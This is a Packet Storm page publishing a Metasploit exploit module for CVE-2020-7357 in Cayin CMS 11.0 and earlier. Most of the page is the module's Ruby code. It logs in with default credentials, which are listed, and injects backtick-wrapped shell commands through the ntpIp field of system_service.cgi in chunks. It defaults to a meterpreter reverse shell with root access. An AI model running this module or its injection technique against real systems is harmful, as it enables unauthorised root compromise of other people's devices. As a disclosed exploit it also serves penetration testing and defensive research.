what you don't know can hurt you

Cayin CMS NTP Server 11.0 Remote Code Execution

Cayin CMS NTP Server 11.0 Remote Code Execution
Posted Jun 18, 2020
Authored by LiquidWorm, h00die | Site metasploit.com

This Metasploit module exploits an authenticated remote code execution vulnerability in Cayin CMS versions 11.0 and below. The code execution is executed in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so repeated requests are made to achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be pretty set and not dynamic between targets. Results in root level access.

tags | exploit, remote, cgi, root, code execution
systems | linux, ubuntu
advisories | CVE-2020-7357
MD5 | 5b71abbf1e64c3cce0a48cc8d48f03b0

Cayin CMS NTP Server 11.0 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cayin CMS NTP Server RCE',
'Description' => %q{
This module exploits an authenticated RCE in Cayin CMS <= 11.0. The RCE is executed
in the system_service.cgi file's ntpIp Parameter. The field is limited in size, so
repeated requests are made to achieve a larger payload.
Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the
environment should be pretty set and not dynamic between targets.
Results in root level access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Gjoko Krstic (LiquidWorm) <gjoko@zeroscience.mk>' # original PoC, discovery
],
'References' =>
[
[ 'EDB', '48553' ],
[ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php' ],
[ 'CVE', '2020-7357' ]
],
'Platform' => ['linux'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
},
'Privileged' => true,
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => 'Jun 4 2020',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'The URI of Cayin CMS', '/']),
OptString.new('USERNAME', [true, 'Username to login with', 'administrator']),
OptString.new('PASSWORD', [true, 'Username to login with', 'admin']),
# from the original advisory, leaving here just in case
# OptString.new('USERNAME', [true, 'Username to login with', 'webadmin'])
# OptString.new('PASSWORD', [true, 'Username to login with', 'bctvadmin'])
]
)
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi')
)

if res.nil? || res.code != 200
return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
end

if res.body.include?('var model = "CMS') && res.body.include?('STR_CAYIN_LOGO')
print_good('Cayin CMS install detected')
return CheckCode::Detected
end

CheckCode::Safe
rescue ::Rex::ConnectionError
CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
end

def login
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'login.cgi'),
'method' => 'POST',
'vars_post' => {
'apply_mode' => 'login',
'lang' => 'ENG',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?

# instead of a 302 like most apps, this does a script window.location to forward...
unless res.code == 200 && res.body.include?('/cgi-bin/system_status.cgi')
fail_with(Failure::BadConfig, "#{peer} - Login failed. Check username and password")
end

res.get_cookies
end

def execute_command(cmd, _opts = {})
# originally attempted to use the 'test' functionality, however it attempts 3 times which
# means our exploit code stage chunks are written 3 times.
# also attempted to just 'save', however it doesn't execute an update.
# 'update' was the prefered functionality
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'system_service.cgi'),
'method' => 'POST',
'cookie' => "#{@cookie} sys=Service",
'vars_post' => {
'exe' => 'webSvrUpdateNtp',
'ntpIp' => "`#{cmd}`"

# test button, executes 3 times
# 'exe' => 'webSvrTestNtp', # just do the 'test', doesnt change config and still runs
# 'ntpIp' => "`#{cmd}`"

# save button, but doesnt execute
# 'save' => 'webSvrNtp',
# 'ntpIp' => "`#{cmd}`",
# 'ntpEnable' => 1,
# 'ntp_server' => 0
}
)
end

def exploit
if check != CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end

@cookie = login
execute_cmdstager(flavor: :printf, linemax: 200)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end

end
Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    11 Files
  • 19
    Jun 19th
    1 Files
  • 20
    Jun 20th
    3 Files
  • 21
    Jun 21st
    2 Files
  • 22
    Jun 22nd
    21 Files
  • 23
    Jun 23rd
    19 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close